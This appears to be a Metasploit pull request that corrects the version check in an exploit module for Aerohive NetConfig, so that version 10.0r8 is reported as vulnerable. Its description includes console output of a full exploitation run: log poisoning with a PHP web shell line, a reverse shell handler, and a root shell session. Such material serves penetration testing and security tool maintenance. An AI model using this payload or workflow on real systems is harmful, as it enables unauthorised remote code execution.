### PR TITLE
aerohive_version_fix

### DIFF
--- a/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
+++ b/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
@@ -117,7 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     begin
-      if Rex::Version.new(version) <= Rex::Version.new('10.0r8a')
+      # Rex::Version treats 10.0r8 as higher than 10.0r8a but 10.0r8 is affected and was probably released before 10.0r8a
+      if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') || version == '10.0r8'
         return CheckCode::Appears("The target is Aerohive NetConfig version #{version}")
       else
         print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.')


### PR DESCRIPTION
# About
This PR adds a fix for a bug in the `aerohive_netconfig_lfi_log_poison_rce` exploit module that resulted in the vulnerable version `10.0r8` being flagged as non-vulnerable.

# Details
The module compares the identified Aerohive version with version `10.0r8a`, since that is the last known affected version (although later versions may be affected as well). As it turns out, `Rex::Version` treats `10.0r8` as higher than `10.0r8a`, but I actually think in this case `10.0r8` was released before `10.0r8a`. I have confirmed that `10.0r8` is vulnerable and exploitable.

# Scenarios
## Targeting Aerohive version 10.0r8 before this bugfix (requires enabling `ForceExploit` )
```
msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > run
[*] Started reverse double SSL handler on 192.168.2.72:443
[*] Running automatic check ("set AutoCheck false" to disable)
[!] It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.
[!] The target is not exploitable. The target is Aerohive NetConfig version 10.0r8 ForceExploit is enabled, proceeding with exploitation.
[*] Attempting to poison the log at /tmp/messages...
[*] Server responded as expected. Continuing...
[*] Executing the payload
[*] Attempting to execute the payload
[!] In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo soK3kJCYVbbCbE7X;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "soK3kJCYVbbCbE7X\n"
[*] Matching...
[*] B is input...
[!] Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:
        <?php system($_POST['cvfB']);?>
[!] Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.
[!] Deleting /tmp/messages or clearing out the file may break the application.
[*] Command shell session 1 opened (192.168.2.72:443 -> 192.168.2.60:50057) at 2022-10-27 09:23:25 +0000

uid=0(root) gid=0(root)
```
## Targeting Aerohive version 10.0r8 after his bugfix:
```
msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > check
[*] 192.168.2.60:443 - The target appears to be vulnerable. The target is Aerohive NetConfig version 10.0r8
```